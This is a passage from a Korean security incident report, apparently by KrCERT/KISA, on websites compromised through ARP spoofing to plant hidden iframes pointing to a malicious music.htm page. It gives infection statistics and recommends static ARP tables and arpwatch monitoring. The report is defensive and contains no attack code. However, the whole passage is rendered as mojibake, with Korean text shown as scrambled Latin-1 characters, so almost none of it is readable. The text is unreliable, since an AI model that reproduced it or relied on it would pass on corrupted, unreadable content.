ÀÎÅÍ³Ý »ç¿ëÀÚ°¡ °ø°ÝÀÚ°¡ ¸¸µé¾î ³õÀº music.htm ÆÄÀÏÀÇ °æ·Î¸¦ Á¤È®È÷ ¾Ë°í ÁÖ¼Òâ¿¡ Á÷Á¢ ÀÔ·ÂÇÏ´Â °æ¿ì´Â µå¹° °ÍÀÌ´Ù. µû¶ó¼, ÀÌ °æ¿ì ÀÎÅÍ³Ý »ç¿ëÀÚ°¡ °æÀ¯Áö »çÀÌÆ®¸¦ ¹æ¹®Çߴµ¥ °æÀ¯Áö »çÀÌÆ®¿¡ ¼û°ÜÁø iframeÀ¸·Î ÀÎÇØ ÀÚµ¿À¸·Î °ø°ÝÀÚ°¡ ¸¸µé¾î ³õÀº music.htm ¿¡ Á¢¼ÓÇÏ¿´´Ù°í ÃßÃøÇÒ ¼ö ÀÖ´Ù. music.htm ÆÄÀÏÀ» ¿äûÇÑ À¥»çÀÌÆ®´Â ÃÑ 1,000¿© °³¿´À¸¸ç, À̵éÀº ¾Ç¼ºÄÚµå °æÀ¯Áö »çÀÌÆ®·Î ¾Ç¿ëµÇ°í ÀÖ´Â »çÀÌÆ®µé·Î ÃßÁ¤µÈ´Ù. À̵é Áß »ó´ç¼ö´Â °ÔÀÓ°ü·Ã »çÀÌÆ®µéÀ̾úÀ¸¸ç, ºÐ¼® ´ç½Ã¿¡ µµ ÀÌµé »çÀÌÆ® Áß ÀϺο¡¼ ¾ÇÀÇÀûÀÎ iframeÀÌ ¼û°ÜÁ® ÀÖ´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ¾ú´Ù.
¡à ¾à 62¸¸¿©´ë PC Áß 9¸¸ 2õ¿©´ë PC °¨¿° ÃßÁ¤
¾Ç¼ºÇÁ·Î±×·¥À» PC¿¡ ¼³Ä¡ÇÏ´Â °ø°Ý ÄÚµåÀÎ music.htm ÆÄÀÏ¿¡ ´ëÇÑ Á¢¼Ó½Ãµµ´Â ÃÑ 11,806,862 ȸ ¹ß»ýÇß´ø °ÍÀ¸·Î ³ªÅ¸³µ´Ù.
ÀÌ Áß ½ÇÁ¦ Á¢¼ÓÀÌ Á¤»óÀûÀ¸·Î ÀÌ·ç¾îÁø °Í(HTTP »óÅÂÄÚµå 200)Àº 625,505°³ÀÇ Unique IP·ÎºÎÅÍÀÇ Á¢¼ÓÀ̾úÀ¸¸ç, °ü¸®ÀÚ¿¡ ÀÇÇØ music.htmÀÌ ¼ö½Ã·Î »èÁ¦µÇ¾î ³ª¸ÓÁö´Â ÆÄÀÏÀÌ Á¸ÀçÇÏÁö ¾Ê´Â´Ù´Â ¿À·ù ¸Þ½ÃÁö(HTTP »óÅÂÄÚµå 404)°¡ ³ªÅ¸³µ´Ù. 62¸¸¿© ´ëÀÇ ÄÄÇ»ÅÍ Áß º¸¾È ÆÐÄ¡°¡ µÇÁö ¾ÊÀº PC°¡ ¾Ç¼ºÇÁ·Î±×·¥À» ´Ù¿î·Îµå ¹ÞÀº ±â·ÏÀÌ ³²°ÜÁ® ÀÖ¾úÀ¸¸ç, ±× ¼ö´Â ¾à 9¸¸ 2õ¿©´ë·Î È®ÀεǾú´Ù.
5. °á·Ð ¹× ´ëÃ¥
º» »ç°íÀÇ ºÐ¼® °á°ú °¡Àå Å« Ư¡À¸·Î´Â, À¥ º¯Á¶¿Í °ü·ÃµÈ ħÇØ »ç°í°¡ ´õ ÀÌ»ó ¼¹ö ³»ºÎ¿¡¼¸¸ÀÇ ¹®Á¦°¡ ¾Æ´Ï¶ó´Â Á¡ÀÌ´Ù. ±×·¯¹Ç·Î ¾Æ¹«¸® À¥ »çÀÌÆ®º¸¾ÈÀ» öÀúÈ÷ °ü¸®Çصµ ³×Æ®¿öÅ©»ó¿¡ ¼ÀÇ À¥ º¯Á¶¸¦ ¹æÁöÇϱâ´Â ¾î·Æ±â ¶§¹®¿¡, ³×Æ®¿öÅ©»ó¿¡¼ÀÇ º¸¾Èµµ ÇÔ²² °í·ÁÇØ¾ß ÇÑ´Ù. ¶ÇÇÑ, ¼¹ö ´ã´çÀÚ»Ó¸¸ ¾Æ´Ï¶ó ³×Æ®¿öÅ© ´ã´çÀÚ, ISP ¶Ç´Â IDC¿î¿ëÀÚ, È£½ºÆûç¾÷ÀÚµî Á¦¹Ý ȯ°æ¿¡ ¿¬°üµÈ ´ã´çÀÚµéÀÇ ÇùÁ¶µµ ¹Ýµå½Ã ÇÊ¿äÇÏ´Ù. º» »ç°í´Â À¥ ¼¹ö³ª ÇÁ·Î±×·¥ÀÇ Ãë¾àÁ¡ÀÌ ¾Æ´Ï¶ó, ARP ÇÁ·ÎÅäÄÝ Ç¥ÁØÀÇ ¾Ç¿ëÀ¸·Î ÀÎÇÑ °ÍÀ̹ǷÎ, Ãë¾àÁ¡ ÆÐÄ¡°¡ ÇÊ¿äÇÏÁö´Â ¾ÊÀ¸¸ç, ¿î¿ëȯ°æÀÇ ¼³Á¤À» °ÈÇÏ´Â °ÍÀ¸·Î º¸¿ÏÇÒ ¼ö ÀÖ´Ù.
ARP spoofing¿¡ ´ëÀÀÇÒ ¼ö ÀÖ´Â ´ëÃ¥À¸·Î´Â, ³×Æ®¿öÅ© °ü¸®ÀÚ°¡ °ÔÀÌÆ®¿þÀÌ¿¡¼ Á¤Àû ARP TableÀ» °ü¸®ÇÏ°í, ½ºÀ§Äª Àåºñ¿¡¼ °¢ Æ÷Æ®º° Á¤ÀûÀÎ MAC ¼³Á¤ ¹× ¼¹ö¿¡¼µµ Á¤ÀûÀÎ ARP cache·Î ¿î¿ëÇÏ´Â °ÍÀÌ ¹Ù¶÷Á÷ÇÏ´Ù. Çö½ÇÀûÀ¸·Î´Â ÁöÄÑÁö±â ¾î·ÆÁö¸¸, NIC ¶Ç´Â ¼¹ö³ª ¶ó¿ìÅÍÀÇ ±³Ã¼°¡ ºó¹øÇÏÁö ¾ÊÀº IDCȯ°æ¿¡¼´Â ÃæºÐÈ÷ °ü¸®ÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù. ±×¸®°í ¸¸¾à ƯÁ¤ È£½ºÆ®·ÎºÎÅÍ Áö¼ÓÀûÀÎ ARP ÆÐŶÀÌ ¼ö½ÅµÈ´Ù¸é ºñÁ¤»óÀûÀΠȣ½ºÆ®ÀÏ °¡´É¼ºÀÌ ³ôÀ¸¹Ç·Î ÁÖÀÇÇØ¾ß ÇÑ´Ù. ARP cache¸¦ °¨µ¶Çϱâ À§ÇÑ µµ±¸µµ Àִµ¥, ¿¹¸¦ µé¸é arpwatch[5] ¶ó´Â ÇÁ·Î±×·¥Àº ARP cache¸¦ ¸ð´ÏÅ͸µÇÏ¿© º¯°æµÇ´Â °æ¿ì¿¡´Â °ü¸®ÀÚ¿¡°Ô ¾Ë¸°´Ù.
ÃÖÁ¾ÀûÀ¸·Î ¾Ç¼ºÄÚµå »ðÀÔÀ¸·Î ÀÎÇÑ ÇÇÇظ¦ ÁÙÀ̱â À§Çؼ´Â, PCÀÇ ¿Ã¹Ù¸¥ °ü¸®¿Í ¼¹öµéÀÇ º¸¾È¼öÁØ °È·Î »ç°í¸¦ ¿¹¹æÇÏ°í, ¾Ç¼ºÇÁ·Î±×·¥ÀÇ Áß°èÁö »Ó¸¸ ¾Æ´Ï¶ó ¾Ç¼ºÇÁ·Î±×·¥ÀÇ À¯Æ÷Áö¿¡ ´ëÇؼµµ Àû±ØÀûÀÎ Àç¹ß¹æÁö ³ë·ÂÀ» ±â¿ï¿©¾ß ÇÑ´Ù. ÀÌ·¯ÇÑ À¥ º¯Á¶ ħÇØ»ç°í°¡ Àç¹ßµÇ´Â ´ëºÎºÐÀÇ °æ¿ì´Â ¾Ç¼ºÄڵ常À» »èÁ¦Çϰųª ¾Ç¼ºÇÁ·Î±×·¥ ÆÄÀÏÀ» »èÁ¦ÇÏ´Â °ÍÀ¸·Î Á¶Ä¡¸¦ ³¡³»´Â °æ¿ì°¡¸¹±â ¶§¹®Àε¥, ¿øÀÎ ºÐ¼®À» ÅëÇØ Ä§ÇØ»ç°íÀÇ °æ·Î¸¦ ÆľÇÇÏ°í º¸¿ÏÇÏÁö ¾ÊÀ¸¸é °è¼ÓÇؼ Àç¹ßµÇ´Â »ç°í¸¦ ¸·±â´Â »ç½Ç»ó ºÒ°¡´ÉÇÏ´Ù. ±×·¯¹Ç·Î ħÇØ»ç°í°¡ ¹ß»ýÇÏ¸é ºÐ¼®ÀýÂ÷ °¡À̵å[6] µî°ú °°Àº ¹®¼¸¦ ÂüÁ¶ÇÏ¿©, öÀúÇÑ ¿øÀκм®°ú º¸¿ÏÀÛ¾÷ µî Àç¹ß¹æÁö¸¦ À§ÇÑ »çÈÄÁ¶Ä¡°¡ ¹Ýµå½Ã ÇÊ¿äÇÏ ´Ù.
[1] KrCERT ÀÎÅÍ³Ý Ä§ÇØ»ç°í µ¿Çâ ¹× ºÐ¼® ¿ùº¸, ¾Ç¼ºÄÚµå »ðÀÔ À¯Çü ºÐ¼®, 2006. 10, www.krcert.or.kr [2] KrCERT ±â¼ú¹®¼, ³×Æ®¿öÅ© ½º´ÏÇÎ ±â¼ú ¹× ¹æÁö´ëÃ¥, 2000. 05, www.krcert.or.kr [3] http://upx.sourceforge.net/ [4] TCP/IP Illustrated Vol 1,p. 60, W.Richard Stevens [5] http://ee.lbl.gov/ [6] KrCERT ħÇØ»ç°í ºÐ¼®ÀýÂ÷ °¡À̵å, www.krcert.or.kr [ÀÚ·á: Çѱ¹Á¤º¸º¸È£ÁøÈï¿ø(KISA)]
|
|